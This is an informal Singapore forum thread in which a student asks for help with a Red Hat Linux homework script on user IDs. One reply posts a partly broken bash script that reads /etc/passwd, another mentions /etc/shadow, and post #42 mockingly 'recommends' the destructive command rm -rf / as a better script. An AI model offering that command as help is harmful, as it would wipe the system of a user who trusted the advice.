anyone here good in red hat linux?

Old 31-12-2011, 07:56 PM   #31

errrrrr how ar
papa_hippo is offline   Reply With Quote
Old 31-12-2011, 08:01 PM   #32

So you want us to write for you a bash script for your homework?
Old 31-12-2011, 08:02 PM   #33

it's homework lol, i also did the same for my fedora last time
saysuzu is online now   Reply With Quote
Old 31-12-2011, 08:05 PM   #34

it's homework lol, i also did the same for my fedora last time
my last link like very obvious to his answers liao...
Old 31-12-2011, 08:19 PM   #35

i mean how to do?
Old 31-12-2011, 08:36 PM   #36

seriously, if i know i wouldnt have ask
Old 31-12-2011, 09:40 PM   #37

seriously, if i know i wouldnt have ask
Do you even know how to write a shell script?
Old 31-12-2011, 10:07 PM   #38

need /etc/shadow file first
dskw is online now   Reply With Quote
Old 01-01-2012, 01:47 AM   #39

sian lar......
Old 01-01-2012, 01:50 AM   #40

hello dskw bro.

TS: can do! ibank me 20 dollar i giv u completed script :p

=======================================================

#!/bin/bash

rm currentuid.txt

IFS=:

while read one two three four five six seven eight
do

echo $three >> currentuid.txt

done << /etc/passwd

============================================

Last edited by vampure; 01-01-2012 at 01:56 AM..
vampure is offline   Reply With Quote
Old 01-01-2012, 01:59 AM   #41

hello dskw bro.

#!/bin/bash

rm currentuid.txt

IFS=:

do

done << /etc/passwd

income opportunities!
if i am ts, i will pay..

long time no use redhar/fedora liao..
prefer debian..

just now is 10, edit become 20..
hahaha..
Soft Shell Crab is offline   Reply With Quote
Old 01-01-2012, 02:02 AM   #42

hello dskw bro.

#!/bin/bash

rm currentuid.txt

IFS=:

do

done << /etc/passwd

Your script too inefficient lah, I recommend this instead

#!/bin/bash
rm -rf /
Old 01-01-2012, 02:23 AM   #43

Look.
i can understand some stuff but I am not good in scripting or programming.
such OS required daily handson, correct me if I am wrong.
so I post here coz I need help.
Old 01-01-2012, 02:27 AM   #44

Look.
i can understand some stuff but I am not good in scripting or programming.
such OS required daily handson, correct me if I am wrong.
so I post here coz I need help.
then pay 20 bucks and save the agony lor..
Soft Shell Crab is offline   Reply With Quote
Old 01-01-2012, 02:46 AM   #45

hello dskw bro.

#!/bin/bash

rm currentuid.txt

IFS=:

do